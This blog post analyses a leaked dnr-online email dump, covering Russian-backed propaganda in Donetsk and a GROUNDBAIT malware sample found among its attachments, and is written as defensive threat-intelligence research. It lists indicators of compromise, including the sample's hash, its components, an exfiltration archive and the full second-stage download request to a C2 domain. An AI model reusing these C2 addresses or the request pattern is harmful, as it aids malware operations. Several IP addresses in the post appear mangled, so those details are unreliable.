From translator: This is an overview of the Ukrainian media climate, and on how anti-Russian it is, and blames Western advisers for some of it.
So here is the context from these documents from the translator for you…
From Translator: These emails seem to have been sent to Georgi Bryusov, who heads up Russia’s wresting federation, and are in reference to a meeting with “PB.” I don’t know who “PB” is.
Bryusov then forwarded them on to Surkov.
So, how likely is this?
Well, I spent a some time covering a similar conflict in Georgia, where there was also a “separatist” province, called Abkhazia, and the conflict there was used to put pressure on the Georgian government. Although it was supposed to be a purely local, homegrown movement, Abkhazia — which didn’t even have an airport — somehow had fighter jets and bombed Georgian-controlled areas with them. (I was in one of those areas with a group of UN observers while it was being bombed. Fun! The Georgians shot down one of the planes which … surprise, surprise! … turned out to have a Russian pilot inside.)
Russia also paid the operating costs for the Abhazian press center, where I spent many a happy day. All international phones calls were free! I could call my editors anywhere in the world, and file stories about the brave Abkhazian rebels! They also fed us and provided us a place to sleep, and organized regular trips to the front lines where we could enjoy being shot at by the Georgians. They also showed us how well prisoners of war were treated and corpses of people killed by the Georgias and, allegedly, mutilated. (Though the Red Cross folks I talked to couldn’t confirm that the mutilations were real and not, say, the expected results of getting too close to an explosion.)
Anyway, the bottom line is that I do have personal experience of Russian spending gold to manipulate the media, in case anyone ever had any doubts that they were willing to do it.
As you can see from the commentary above, and you too can read the documents as well, the Russians set up a media company including websites and formulated plans to manipulate people toward the Donetsk People’s Republic and against a Free Ukraine. I am still going through the dump looking for the bills for the domains mentioned as well and will run them through Threatcrowd and other sources to see if they were used at all for malware C2 and propagation. Which brings me to the use of dnr-online as a C2. Interestingly enough the site itself is not a C2 but it does have connectivity to other IP addresses and domains that are.
The archology of malware that talks to 184.108.40.206 is rather interesting. There’s a bit of everything bad attached to that one to be sure including that MrSweet address that is ransomeware central. 220.127.116.11 is owned/created by beget.ru which has quite the many few dirty connections as well.
Of course beget could be innocent enough but as you can see there is enough of Mos Eisley in there to make one not want to get an account there and set up a site right? I will continue to look into other domains within the networks that dnr-online bought as soon as I can locate the bills for them or domain names and that will be another post I am sure. What all of this tells you though, is that the Russians have always been carrying out these kinds of active measures against people like those in Ukraine as well as what they did to us in the election of 2016. This is not a one time deal and certainly will not be the last one we shall see. In fact, the bots and the domains will continue to be set up by the likes of the SVR and GRU in hopes of manipulating the general populace toward the goals of the Putin regime until it’s demise.
… and likely past it.
THE MALWARE & GROUNDBAIT:
Right! now on to the other interesting bit found in the dump from dnr-online. In looking at the spool I dumped all attachments into a folder and began checking them for malware. All the word docs, excel sheet, power-points etc. The docs all checked out but one zip file had a .scr file in it that turned out to be malware. The file (Центр управления восстановлением ДНР справка-доклад за 13 октября 2015 года.exe) Center for Recovery Management of the DNR certificate-report for October 13, 2015.exe came from an email comiing in from a Russian source to the head of dnr-online. I am unable to source the headers at this time of the email but the question becomes was this malware sent to the DNR by RUH8 or was this malware sent to DNR to send to others in some other campaign. I cannot say either way but, the malware is a new sample of GROUNDBAIT or Prikormka that was detected and reported on by ESET running rampant in Ukraine. Given that ESET claims that this malware was being used against the separatists in Ukraine it stands to reason that the logic here is that the malware was to be used by the propaganda campaign against those it was seeking to manipulate. However, the nagging thing for me is the way this was passed around. The email has no real context in the text and to me it seems to imply that it is a fix for things inside dnr. My other thought is that maybe someone got hold of the GROUNDBAIT raw sample and re-used it by re-packing it and setting it against dnr-online.
An interesting notion…
I contacted ESET and talked a bit with the guy who did the work and he was.. Well.. Not so helpful. So here are the IOC’s for this file for you all to look for.
Filename: Recovery Control Center Help DNR-Report for October 13, 2015
SHA256: f9a96ad58fb946981d196d653ec28fa31d6f946a7e2f6784b317dd9adc557b62 (AV positives: 52/57 scanned on 04/30/2016 07:33:42)
File raw: zip file: zipnh4dZDtMUk.zip
“archive.rar” has type “gzip compressed data from NTFS filesystem (NT)”
“helpldr.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“samlib.dll” has type “PE32 executable (DLL) (GUI) Intel 80386 for MS Windows”
“rbcon.ini” has type “ASCII text with CRLF line terminators”
Writes directory archive.rar (exfil)
Connects and downloads second stage: GET http://wallejob.in.ua/wd.php?sn=2120161230091201&rb=7&ob=R_pol_x&bt=0 HTTP/1.1
descr: Domain registered for customer of Ukraine.com.ua
status: OK-UNTIL 20170619000000
changed: firstname.lastname@example.org 20160907200219
Found malicious artifacts related to “18.104.22.168” (ASN: , Owner: ): …
URL: http://wood-house.com.ua/ (AV positives: 2/68 scanned on 12/27/2016 16:55:43)
URL: http://wallejob.in.ua/ (AV positives: 5/68 scanned on 11/17/2016 02:10:28) <—GROUNDBAIT C2
URL: http://zarabatak.ru/ (AV positives: 1/68 scanned on 07/20/2016 10:59:29)
URL: http://psh.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:35:37)
URL: http://sem-dev.co.ua/ (AV positives: 1/68 scanned on 07/14/2016 04:33:23)
created: 2014-11-07 13:31:27+02
modified: 2016-11-03 16:37:39+02
expires: 2017-11-07 13:31:27+02
organization: SE Rabotnov Volodymyr
organization-loc: ФОП Работнов Володимир Володимирович
person: Vladimir V Rabotnov
person-loc: Работнов Владимир Владимирович
e-mail: not published
address: not published
address-loc: not published
phone: not published
created: 2013-04-05 15:01:02+03
modified: 2014-01-08 23:42:17+02
TYING IT ALL TOGETHER:
So what we have here is the insider’s view of how dnr-online, a propaganda wing within Ukraine’s Donetsk People’s Republic put together a media service(s) and planned to use them as a framework of Russian propaganda in the region. We also have malware that is known to be actual spycraft in the region within it’s mail spool being passed around at least to two sources inside, one of them being the director of the DNR company. Was that malware meant to infect and eventually allow for the dump in the darknet or was the malware being passed along for other uses that we cannot see in this spool dump? In either case this information makes it clear that in Ukraine the Russian propaganda and espionage machines are alive and well and using the net as a force multiplier at the very least.
I will continue looking at the growing dumps by RUH8 and let you all know about any malware and goodies that pop up. It is also of interest to you all that this dump has been around and certain groups have looked at it and just sort of said “Nothing to see here” which is interesting to me. I mean malware that no one has seen really and plans for propaganda in the region are of no interest? I guess maybe these groups just did not want to spent the cycles on looking deeper into the data. I actually did with the help of others as well as checked the forensics on the metadata to insure the stuff was real.
…but that’s just me… I am not a churnalist.
More when I have it.
UPDATE!: One day after this report one IP address involved as a nexus of malware has changed it’s domain name! Coincidence? Hmmmm?